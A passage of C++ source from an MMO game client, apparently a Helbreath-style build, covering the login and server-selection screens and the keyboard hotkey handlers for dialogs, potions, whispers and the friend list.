		StartInputString(350, 285, 11, cName);
		ClearInputString();
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) 
	{
		case 1:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;

		case 2:
			if (m_cCurFocus == 3) m_cCurFocus = 4;
			else if (m_cCurFocus == 4) m_cCurFocus = 3;
			break;

		case 3:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;

		case 4:
			if (m_cCurFocus == 3) m_cCurFocus = 4;
			else if (m_cCurFocus == 4) m_cCurFocus = 3;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (m_bEnterPressed == TRUE)
	{	
		m_bEnterPressed = FALSE;
		PlaySound('E', 14, 5);

		switch (m_cCurFocus) 
		{
		case 1:
			m_cCurFocus++;
			if( m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;

		case 2:
		case 3:
			if ((strlen(cName) == 0) || (strlen(cPassword) == 0)) break;
			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));
			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
			GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort +(rand()%1), WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_LOGIN;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "11");
			delete pMI;
			return;

		case 4:	// Cancel
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
	}	}

	if (m_bEscPressed == TRUE)
	{	
		EndInputString();
		ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	if (cPrevFocus != m_cCurFocus)
	{	EndInputString();
		switch (m_cCurFocus)
		{
		case 1:
			StartInputString(350, 285, 11, cName);
			break;
		
		case 2:
			StartInputString(350, 325, 11, cPassword, TRUE);
			break;
		case 3:
		case 4:
			break;
		}
		cPrevFocus = m_cCurFocus;
	}


	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);

	if (cMIresult == DEF_MIRESULT_CLICK)
	{	
		PlaySound('E', 14, 5);
		switch (iMIbuttonNum) 
		{
		case 1:
			m_cCurFocus = 1;
			break;

		case 2:
			m_cCurFocus = 2;
			break;

		case 3:
			if ((strlen(cName) == 0) || (strlen(cPassword) == 0)) break;
			EndInputString();
			ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
			ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));
			strcpy(m_cAccountName, cName);
			strcpy(m_cAccountPassword, cPassword);
			m_pLSock = new class XSocket(m_hWnd, DEF_SOCKETBLOCKLIMIT);
            GetIPByDNS();
			m_pLSock->bConnect(m_cLogServerAddr, m_iLogServerPort +(rand()%1), WM_USER_LOGSOCKETEVENT);
			m_pLSock->bInitBufferSize(30000);
			ChangeGameMode(DEF_GAMEMODE_ONCONNECTING);
			m_dwConnectMode = MSGID_REQUEST_LOGIN;
			ZeroMemory(m_cMsg, sizeof(m_cMsg));
			strcpy(m_cMsg, "11");
			delete pMI;
			return;

		case 4:
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
	}	}

	if ((msX >= 240) && (msX <= 330) && (msY >= 400) && (msY <= 420)) m_cCurFocus = 3;
	if ((msX >= 460) && (msX <= 550) && (msY >= 400) && (msY <= 420)) m_cCurFocus = 4;

	_Draw_OnLogin(cName, cPassword, msX, msY, m_cGameModeCount);
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::UpdateScreen_OnSelectServer()
{
 short msX, msY, msZ, sX, sY;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 static char  cPrevFocus;
 DWORD dwTime = timeGetTime();
 BOOL bFlag = TRUE;

	sX = 146;
	sY = 114;
	if (m_cGameModeCount == 0) {
		EndInputString();

		pMI = new class CMouseInterface;
		pMI->AddRect(130,177,270,198);
		pMI->AddRect(130,199,270,225);
		pMI->AddRect(256,279,331,308);

		cPrevFocus  = 1;
		m_cCurFocus = 1;
		m_cMaxFocus = 3;

		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;
	}
	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_cArrowPressed != 0)
	{	switch (m_cArrowPressed) {
		case 1:
			m_cCurFocus--;
			if (m_cCurFocus <= 0) m_cCurFocus = m_cMaxFocus;
			break;

		case 3:
			m_cCurFocus++;
			if (m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
			break;
		}
		m_cArrowPressed = 0;
	}

	if (m_bEnterPressed == TRUE)
	{	m_bEnterPressed = FALSE;
		PlaySound('E', 14, 5);
		switch (m_cCurFocus) {
		case 1:
			if (strlen(m_cWorldServerName) ==0)
			ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));
			strcpy(m_cWorldServerName, NAME_WORLDNAME);
			ChangeGameMode(DEF_GAMEMODE_ONLOGIN);
			delete pMI;
			return;

		case 2:
			ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));
			strcpy(m_cWorldServerName, "WS2");
			ChangeGameMode(DEF_GAMEMODE_ONLOGIN);
			delete pMI;
			return;

		case 3:	// Cancel
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
	}	}

	if (m_bEscPressed == TRUE)
	{	ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}
	if (cPrevFocus != m_cCurFocus)
	{	cPrevFocus = m_cCurFocus;
	}
	m_DDraw.ClearBackB4();
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOGIN, 0,0,0, TRUE);
	if (m_cGameModeCount > 20) 
			DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOGIN, 40,121,1, TRUE);
	else if ((m_cGameModeCount >= 15) && (m_cGameModeCount <= 20)) m_pSprite[DEF_SPRID_INTERFACE_ND_LOGIN]->PutTransSprite25(40,121,1, TRUE);

	if (m_cGameModeCount > 20)
	{	if (m_cCurFocus == 1) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOGIN, 138, 177, 5, TRUE);
		if (m_cCurFocus == 2) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOGIN, 130, 205, 6, TRUE);
		if (m_cCurFocus == 3) DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_LOGIN, 256, 282, 4, TRUE);
	}
	DrawVersion();
	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);
	if (cMIresult == DEF_MIRESULT_CLICK) {
		PlaySound('E', 14, 5);

		switch (iMIbuttonNum) {
		case 1:
			if (m_cCurFocus == 1) {
				ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));
				strcpy(m_cWorldServerName, NAME_WORLDNAME);
				ChangeGameMode(DEF_GAMEMODE_ONLOGIN);
				delete pMI;
				return;
			}
			else m_cCurFocus = 1;
			break;

		case 2:
			if (m_cCurFocus == 2) {
				ZeroMemory(m_cWorldServerName, sizeof(m_cWorldServerName));
				strcpy(m_cWorldServerName, "WS2");
				ChangeGameMode(DEF_GAMEMODE_ONLOGIN);
				delete pMI;
				return;
			}
			else m_cCurFocus = 2;
			break;

		case 3:
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			delete pMI;
			return;
		}
	}

	if ((msX >= 130) && (msX <= 295) && (msY >= 175) && (msY <= 198)) m_cCurFocus = 1;
	if ((msX >= 130) && (msX <= 295) && (msY >= 199) && (msY <= 225)) m_cCurFocus = 2;
	if ((msX >= 256) && (msX <= 331) && (msY >= 279) && (msY <= 308)) m_cCurFocus = 3;

	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::OnSysKeyDown(WPARAM wParam)
{
	switch( wParam )
	{
	case VK_SHIFT:
		m_bShiftPressed = TRUE;
		break;
	case VK_CONTROL:
		m_bCtrlPressed = TRUE;
		break;
	case VK_RETURN:
		m_bEnterPressed = TRUE;
		break;
	}
}

void CGame::OnSysKeyUp(WPARAM wParam)
{
	switch( wParam )
	{
	case VK_SHIFT:
		m_bShiftPressed = FALSE;
		break;
	case VK_CONTROL:
		m_bCtrlPressed = FALSE;
		break;
	case VK_RETURN:
		m_bEnterPressed = FALSE;
		if( m_bToggleScreen == TRUE )
		{	m_bIsRedrawPDBGS = TRUE;
			m_DDraw.ChangeDisplayMode(G_hWnd);
		}
		break;
	case VK_ESCAPE:
		m_bEscPressed = FALSE;
		break;
	}
}

void CGame::OnKeyUp(WPARAM wParam)
{
 int i=0;
 DWORD dwTime = timeGetTime();

	switch (wParam) {
	case VK_SHIFT:
		m_bShiftPressed = FALSE;
		break;
	case VK_CONTROL:
		m_bCtrlPressed = FALSE;
		break;

	// MORLA - Hotkeys Teclado
	case 49:
		if ((m_bCtrlPressed == false)&&(m_bInputStatus == FALSE)&&( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ))
		UseShortCutPanel(3, false);	
		break;
	case 50:
		if ((m_bCtrlPressed == false)&&(m_bInputStatus == FALSE)&&( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ))
		UseShortCutPanel(4, false);	
		break;
	case 51:
		if ((m_bCtrlPressed == false)&&(m_bInputStatus == FALSE)&&( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ))
		UseShortCutPanel(5, false);	
		break;
	case 52:
		if ((m_bCtrlPressed == false)&&(m_bInputStatus == FALSE)&&( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ))
		UseShortCutPanel(6, false);	
		break;
	case 53:
		if ((m_bCtrlPressed == false)&&(m_bInputStatus == FALSE)&&( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ))
		UseShortCutPanel(7, false);	
		break;

	case 65://'A'
		
		break;

	// VAMP - online users list
	case 81://'Q'
		if( ( m_bCtrlPressed == TRUE ) && ( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ) )
		{	if (m_bIsDialogEnabled[55] == FALSE)
			{	EnableDialogBox(55, NULL, NULL, NULL);
			}else	
			{	DisableDialogBox(55);
		}	}
		break;

	case 69://'E'
		if (m_bCtrlPressed == TRUE && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{
			if(m_bShowEmblems)
			{
				m_bShowEmblems = FALSE;
				AddEventList("Show Emblems is now [OFF]", 10);
			}
			else
			{
				m_bShowEmblems = TRUE;
				AddEventList("Show Emblems is now [ON]", 10);
			}
		}
		break;

	case 79://'O'
		if( ( m_bCtrlPressed == TRUE ) && ( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ) )
		{	if (m_bIsDialogEnabled[60] == FALSE)
			{	
				EnableDialogBox(60, NULL, NULL, NULL);
				bSendCommand(MSGID_REQUEST_ONLINE);	 //ahora es lo mismo poner eso que todos esos NULL, NULL etc
				
			}else	
			{	DisableDialogBox(60);
		}	}
		break;

	case 68://'D'
		if (m_bCtrlPressed == TRUE && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	m_cDetailLevel++;
			if( m_cDetailLevel > 2 ) m_cDetailLevel = 0;
			switch( m_cDetailLevel ) {
			case 0:
				AddEventList( NOTIFY_MSG_DETAIL_LEVEL_LOW, 10 );
				break;
			case 1:
				AddEventList( NOTIFY_MSG_DETAIL_LEVEL_MEDIUM, 10 );
				break;
			case 2:
				AddEventList( NOTIFY_MSG_DETAIL_LEVEL_HIGH, 10 );
				break;
		}	}
		break;

	case 70: //'F'
		if (m_bCtrlPressed && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	if (m_bIsDialogEnabled[43] == FALSE)
			{	EnableDialogBox(43, NULL, NULL, NULL);
				char buf[1024]; int konieclinii; unsigned long linie = 0;
				FILE * f = fopen("contents\\FriendList.txt", "rt");
				if (f == NULL) break; // Centuu: si el archivo no existe, crash
				else
				{
					m_iTotalFriends = 0;
					while(fgets(buf, 1024, f)) {
						konieclinii = 0;
						int i = strlen(buf);
						if (i > 0 && buf[--i] == '\n') {
							buf[i] = 0; // kasujemy znak konca linii
							konieclinii = 1;
							linie++;
						}
						if (linie-1 < 13) {
							strcpy(m_cFriends[linie-1], buf);
							m_iTotalFriends++;
						}
					}
					if (m_iTotalFriends > 12) m_iTotalFriends = 12;
					fclose(f);
				}
			}else DisableDialogBox(43);
		} 
		break;

	case 72: // 'H' // Snoopy: Mimics VK_F1
		if (m_bCtrlPressed && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	if (m_bIsDialogEnabled[35] == FALSE)
				EnableDialogBox(35, NULL, NULL, NULL);
			else
			{	DisableDialogBox(35);
				DisableDialogBox(18);
		}	}
		break;

	case 87: // 'W' // Snoopy: mimics VK_F11 Togles transparency
		if (m_bCtrlPressed && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	m_bDialogTrans = !m_bDialogTrans;
		}
		break;

	case 88: // 'X' // Snoopy: mimics VK_F12 Logout Window
		if (m_bCtrlPressed && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	if (m_bIsDialogEnabled[19] == FALSE)
				EnableDialogBox(19, NULL, NULL, NULL);
			else DisableDialogBox(19);
		}
		break;

	case 77://'M'
		if( m_cGameMode == DEF_GAMEMODE_ONMAINGAME )
		{	if( m_bCtrlPressed )
			{	if( m_bIsDialogEnabled[9] == TRUE ) DisableDialogBox(9);
				else EnableDialogBox(9, 0, 0, 0, NULL);
		}	}
		break;

	case 80://'P' VAMP - party info
		if( ( m_bCtrlPressed == TRUE ) && ( m_cGameMode == DEF_GAMEMODE_ONMAINGAME ) )
		{	
			if (m_bShowParty)
			{	m_bShowParty = FALSE;
				AddEventList( "Party information disabled.", 10 );
			}
			else
			{	m_bShowParty = TRUE;
				AddEventList( "Party information enabled.", 10 );
			}
		}
		break;



	case 82://'R'
		if (m_bCtrlPressed == TRUE && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	if( m_bRunningMode )
			{	m_bRunningMode = FALSE;
				AddEventList( NOTIFY_MSG_CONVERT_WALKING_MODE, 10 );
			}else
			{	m_bRunningMode = TRUE;
				AddEventList( NOTIFY_MSG_CONVERT_RUNNING_MODE, 10 );
		}	}
		break;

	case 83://'S'
		if (m_bCtrlPressed == TRUE && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	if (m_bMusicStat == TRUE) // Music Off
			{	m_bMusicStat = FALSE;
				if (m_bSoundFlag)
				{	StopBGM();	// Snoopy: mp3 support
					if (m_pBGM != NULL)
					{	m_pBGM->bStop();
						delete m_pBGM;
						m_pBGM = NULL;
				}	}
				AddEventList( NOTIFY_MSG_MUSIC_OFF, 10 );
				break;
			}else if( m_bSoundStat == TRUE )
			{	m_pESound[38]->bStop();
				m_bSoundStat = FALSE;
				AddEventList( NOTIFY_MSG_SOUND_OFF, 10 );
				break;
			}else 	// Music On
			{	if( m_bSoundFlag )
				{	m_bMusicStat = TRUE;
					AddEventList( NOTIFY_MSG_MUSIC_ON, 10 );
				}
				if( m_bSoundFlag )
				{	m_bSoundStat = TRUE;
					AddEventList( NOTIFY_MSG_SOUND_ON, 10 );
				}
				StartBGM();
		}	}
		break;

	case 84: //'T'
		if (m_bCtrlPressed == TRUE && m_cGameMode == DEF_GAMEMODE_ONMAINGAME && (!m_bInputStatus) )
		{	char tempid[100], cLB, cRB;
			short sX, sY, msX, msY, msZ;
			sX = m_stDialogBoxInfo[10].sX;
			sY = m_stDialogBoxInfo[10].sY;
			ZeroMemory( tempid, sizeof( tempid ) );
			m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);
			if( m_bIsDialogEnabled[10] == TRUE && (msX >= sX + 20) && (msX <= sX + 360) && (msY >= sY + 35) && (msY <= sY + 139) )
			{	CStrTok *pStrTok;
				char   * token, cBuff[64];
				char   seps[] = ":";
				int i = (139-msY+sY)/13;
				if( m_pChatScrollList[i + m_stDialogBoxInfo[10].sView] == NULL ) return;
				if( m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg[0] == ' ' ) i++;
				strcpy(cBuff, m_pChatScrollList[i + m_stDialogBoxInfo[10].sView]->m_pMsg);
				pStrTok = new class CStrTok(cBuff, seps);
				token = pStrTok->pGet();
				wsprintf( tempid, "/to %s", token );
				bSendCommand(MSGID_COMMAND_CHATMSG, NULL, NULL, NULL, NULL, NULL, tempid);
				delete pStrTok;
			}else if( _tmp_sOwnerType < 7 && (strlen(_tmp_cName)>0) && (m_iIlusionOwnerH==NULL)
						&& ((m_bIsCrusadeMode == FALSE) || _iGetFOE(_tmp_iStatus) >= 0))
			{	wsprintf( tempid, "/to %s", _tmp_cName );
				bSendCommand(MSGID_COMMAND_CHATMSG, NULL, NULL, NULL, NULL, NULL, tempid);
			}else
			{	EndInputString();
				wsprintf( m_cChatMsg, "/to " );
#ifdef RES_HIGH
				StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
				StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
		}	}
		break;
	case 107: //'+'
		if(m_bInputStatus == FALSE) m_bZoomMap = TRUE;
		break;
	case 109: //'-'
		if(m_bInputStatus == FALSE) m_bZoomMap = FALSE;
		break;

	case VK_F2 :
		UseShortCut(1);
		break;

	case VK_F3:
		UseShortCut(2);
		break;

	case VK_INSERT:
		if (m_iHP <= 0) return;
		if (m_bItemUsingStatus == TRUE)
		{	
			AddEventList(USE_POTION, 10);
			return;
		}

		if (m_bIsDialogEnabled[27] == TRUE)
		{	AddEventList(USED_POTION, 10);
			return;
		}

		// centu: red candy
		for (i = 0; i < DEF_MAXITEMS; i++)
		if ( (m_pItemList[i] != NULL) && (m_bIsItemDisabled[i] != TRUE) &&
			 (m_pItemList[i]->m_sSprite == 6) && (m_pItemList[i]->m_sSpriteFrame == 1 || m_pItemList[i]->m_sSpriteFrame == 2 || m_pItemList[i]->m_sSpriteFrame == 131))
		{	
			
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_USEITEM, NULL, i, NULL, NULL, NULL);
				m_bIsItemDisabled[i] = TRUE;
				m_bItemUsingStatus = TRUE;
				return;
			
		}
		
		break;

	case VK_DELETE:
		if (m_iHP <= 0) return;
		if (m_bItemUsingStatus == TRUE)
		{	AddEventList(USE_POTION, 10);
			return;
		}
		if (m_bIsDialogEnabled[27] == TRUE)
		{	AddEventList(USED_POTION, 10);
			return;
		}

		// centu: blue candy
		for (i = 0; i < DEF_MAXITEMS; i++)
		if ( (m_pItemList[i] != NULL) && (m_bIsItemDisabled[i] != TRUE) &&
			 (m_pItemList[i]->m_sSprite == 6) && (m_pItemList[i]->m_sSpriteFrame == 3 || m_pItemList[i]->m_sSpriteFrame == 4 || m_pItemList[i]->m_sSpriteFrame == 132))
		{	
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_USEITEM, NULL, i, NULL, NULL, NULL);
				m_bIsItemDisabled[i] = TRUE;
				m_bItemUsingStatus = TRUE;
				return;
		}
		break;

	case VK_END:
		if ( ((m_bIsDialogEnabled[7] == TRUE) && (m_stDialogBoxInfo[7].cMode == 1) && (iGetTopDialogBoxIndex() == 7)) ||
			((m_bIsDialogEnabled[17] == TRUE) && (m_stDialogBoxInfo[17].cMode == 1) && (iGetTopDialogBoxIndex() == 17)) )
		{}else if ((!m_bInputStatus) && (m_cBackupChatMsg[0] != '!') && (m_cBackupChatMsg[0] != '~') && (m_cBackupChatMsg[0] != '^') &&
				 (m_cBackupChatMsg[0] != '@'))
		{	ZeroMemory(m_cChatMsg, sizeof(m_cChatMsg));
			strcpy(m_cChatMsg, m_cBackupChatMsg);
#ifdef RES_HIGH
			StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
			StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
		}
		break;

	case VK_F4:
		if (m_cGameMode != DEF_GAMEMODE_ONMAINGAME) return;
		UseMagic(m_sMagicShortCut);
		break;

	case VK_F5:
		if (m_bIsDialogEnabled[1] == FALSE)
			EnableDialogBox(1, NULL, NULL, NULL);
		else DisableDialogBox(1);
		break;

	case VK_F6:
		if (m_bIsDialogEnabled[2] == FALSE)
			EnableDialogBox(2, NULL, NULL, NULL);
		else DisableDialogBox(2);
		break;

	case VK_F7:
		if (m_bIsDialogEnabled[3] == FALSE)
			EnableDialogBox(3, NULL, NULL, NULL);
		else DisableDialogBox(3);
		break;

	case VK_F8:
		if (m_bIsDialogEnabled[15] == FALSE)
			EnableDialogBox(15, NULL, NULL, NULL);
		else DisableDialogBox(15);
		break;

	case VK_F9:
		if (m_bIsDialogEnabled[10] == FALSE)
			EnableDialogBox(10, NULL, NULL, NULL);
		else DisableDialogBox(10);
		break;

	case VK_F10: // f10 player panel
		if (m_bIsDialogEnabled[56] == TRUE)
			 DisableDialogBox(56);
		else EnableDialogBox(56, NULL, NULL, NULL);
		break;

	case VK_F11:
		m_bDialogTrans = !m_bDialogTrans;
		break;

	case VK_F12:
		if(m_bInputStatus) return;
		if (m_bIsDialogEnabled[19] == FALSE)
			EnableDialogBox(19, NULL, NULL, NULL);
		else DisableDialogBox(19);
		break;

	case VK_F1:
		if (m_bInputStatus) return;
		if (m_bIsDialogEnabled[35] == FALSE) // 35 CLEROTH
			EnableDialogBox(35, NULL, NULL, NULL);
		else
		{	DisableDialogBox(35);
			DisableDialogBox(18);
		}
		break;

	case VK_UP:
		m_cArrowPressed	= 1;
		if( m_cGameMode == DEF_GAMEMODE_ONMAINGAME )
		{	int iTotalMsg=0;
			for( int i=DEF_MAXWHISPERMSG-1 ; i>=0 ; i-- )
			{	if( m_pWhisperMsg[i] != NULL )
				{	iTotalMsg = i;
					break;
			}	}
			m_cWhisperIndex ++;
			if( m_cWhisperIndex > iTotalMsg ) m_cWhisperIndex = 0;
			if( m_cWhisperIndex < 0 ) m_cWhisperIndex = iTotalMsg;
			if( m_pWhisperMsg[m_cWhisperIndex] != NULL ) {
			EndInputString();
			wsprintf( m_cChatMsg, "/to %s", m_pWhisperMsg[m_cWhisperIndex]->m_pMsg );
#ifdef RES_HIGH
			StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
			StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
		}	}
		break;

	case VK_RIGHT:
		m_cArrowPressed	= 2;
		break;

	case VK_DOWN:
		m_cArrowPressed	= 3;
		if( m_cGameMode == DEF_GAMEMODE_ONMAINGAME )
		{	int iTotalMsg=0;
			for( int i=DEF_MAXWHISPERMSG-1 ; i>=0 ; i-- )
			{	if( m_pWhisperMsg[i] != NULL )
				{	iTotalMsg = i;
					break;
			}	}
			m_cWhisperIndex --;
			if( m_cWhisperIndex < 0 ) m_cWhisperIndex = iTotalMsg;
			if( m_cWhisperIndex > iTotalMsg ) m_cWhisperIndex = 0;
			if( m_pWhisperMsg[m_cWhisperIndex] != NULL ) {
			EndInputString();
			wsprintf( m_cChatMsg, "/to %s", m_pWhisperMsg[m_cWhisperIndex]->m_pMsg );
#ifdef RES_HIGH
			StartInputString(10, 532, sizeof(m_cChatMsg), m_cChatMsg);
#else
			StartInputString(10, 414, sizeof(m_cChatMsg), m_cChatMsg);
#endif
		}	}
		break;

	case VK_LEFT:
		m_cArrowPressed	= 4;
		break;

	case VK_SNAPSHOT:
		CreateScreenShot();
		break;

	case VK_TAB:
		if( m_bShiftPressed )
		{	m_cCurFocus--;
			if( m_cCurFocus < 1 ) m_cCurFocus = m_cMaxFocus;
		}else
		{	m_cCurFocus++;
			if( m_cCurFocus > m_cMaxFocus) m_cCurFocus = 1;
		}
		if (m_cGameMode == DEF_GAMEMODE_ONMAINGAME)
		{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_TOGGLECOMBATMODE, NULL, NULL, NULL, NULL, NULL);
		}
		break;

	case VK_RETURN:
		m_bEnterPressed = TRUE;
		break;

	case VK_HOME:
		if (m_cGameMode == DEF_GAMEMODE_ONMAINGAME) {
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_TOGGLESAFEATTACKMODE, NULL, NULL, NULL, NULL, NULL);
		}
		break;

	case VK_ESCAPE:
		m_bEscPressed = TRUE;
		if (m_cGameMode == DEF_GAMEMODE_ONMAINGAME)
		{	if ((m_bIsObserverMode == TRUE) && (m_bShiftPressed)) { //ObserverMode Shift+Esc
				// Log Out
				if (m_cLogOutCount == -1) m_cLogOutCount = 1;
				DisableDialogBox(19);
				PlaySound('E', 14, 5);
			}
			else if(m_cLogOutCount != -1) {
				if (m_bForceDisconn == FALSE) { //Esc
					m_cLogOutCount = -1;
					AddEventList(DLGBOX_CLICK_SYSMENU2, 10);
				}
			}
			if (m_bIsGetPointingMode == TRUE) {
				m_bIsGetPointingMode = FALSE;
				AddEventList(COMMAND_PROCESSOR1, 10);
			}
			m_bIsF1HelpWindowEnabled = FALSE;
		}
		break;

	case 33:
		if (m_cGameMode != DEF_GAMEMODE_ONMAINGAME) return;
		if (m_bInputStatus) return;
		if (m_bIsSpecialAbilityEnabled == TRUE)
		{	if (m_iSpecialAbilityType != 0) {
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_ACTIVATESPECABLTY, NULL, NULL, NULL, NULL, NULL);
				m_bIsSpecialAbilityEnabled = FALSE;
			}
			else AddEventList(ON_KEY_UP26, 10);
		}
		else {
			if (m_iSpecialAbilityType == 0) AddEventList(ON_KEY_UP26, 10);
			else {
				if ((m_sPlayerAppr4 & 0x00F0) != 0) {
					AddEventList(ON_KEY_UP28, 10);
					return;
				}

				i = (dwTime - m_dwSpecialAbilitySettingTime)/1000;
				i = m_iSpecialAbilityTimeLeftSec - i;
				if (i < 0) i = 0;

				ZeroMemory(G_cTxt, sizeof(G_cTxt));
				if (i < 60) {
					switch (m_iSpecialAbilityType) {
					case 1: wsprintf(G_cTxt, ON_KEY_UP29, i); break;//"
					case 2: wsprintf(G_cTxt, ON_KEY_UP30, i); break;//"
					case 3: wsprintf(G_cTxt, ON_KEY_UP31, i); break;//"
					case 4: wsprintf(G_cTxt, ON_KEY_UP32, i); break;//"
					case 5: wsprintf(G_cTxt, ON_KEY_UP33, i); break;//"
					case 50:wsprintf(G_cTxt, ON_KEY_UP34, i); break;//"
					case 51:wsprintf(G_cTxt, ON_KEY_UP35, i); break;//"
					case 52:wsprintf(G_cTxt, ON_KEY_UP36, i); break;//"
					}
				}
				else {
					switch (m_iSpecialAbilityType) {
					case 1: wsprintf(G_cTxt, ON_KEY_UP37, i/60); break;//"
					case 2: wsprintf(G_cTxt, ON_KEY_UP38, i/60); break;//"
					case 3: wsprintf(G_cTxt, ON_KEY_UP39, i/60); break;//"
					case 4: wsprintf(G_cTxt, ON_KEY_UP40, i/60); break;//"
					case 5: wsprintf(G_cTxt, ON_KEY_UP41, i/60); break;//"
					case 50:wsprintf(G_cTxt, ON_KEY_UP42, i/60); break;//"
					case 51:wsprintf(G_cTxt, ON_KEY_UP43, i/60); break;//"
					case 52:wsprintf(G_cTxt, ON_KEY_UP44, i/60); break;//"
					}
				}
				AddEventList(G_cTxt, 10);
			}
		}
		break;
	}
}

void CGame::OnKeyDown(WPARAM wParam)
{
	switch (wParam) {
	case VK_CONTROL:
		m_bCtrlPressed = TRUE;
		break;
	case VK_SHIFT:
		m_bShiftPressed = TRUE;
		break;
	case VK_INSERT:
	case VK_DELETE:
	case VK_TAB:
	case VK_RETURN:
	case VK_ESCAPE:
	case VK_END:
	case VK_HOME:
	case VK_F1:
	case VK_F2:
	case VK_F3:
	case VK_F4:
	case VK_F5:
	case VK_F6:
	case VK_F7:
	case VK_F8:
	case VK_F9:
	case VK_F10:
	case VK_F11:
	case VK_F12:
	case VK_PRIOR: // Page-Up
	case VK_NEXT: // Page-Down
	case VK_LWIN:
	case VK_RWIN:
	case VK_MULTIPLY:
	case VK_ADD: //'+'
	case VK_SEPARATOR:
	case VK_SUBTRACT: //'-'
	case VK_DECIMAL:
	case VK_DIVIDE:
	case VK_NUMLOCK:
	case VK_SCROLL:
		break;

	default:
		if (m_cGameMode == DEF_GAMEMODE_ONMAINGAME)
		{	if (m_bCtrlPressed)
			{	switch (wParam) {
				case 48: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 9; break; // 0
				case 49: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 0; break; // 1
				case 50: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 1; break; // 2
				case 51: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 2; break; // 3
				case 52: EnableDialogBox(3, NULL, NULL, NULL); m_stDialogBoxInfo[3].sView = 3; break; // 4
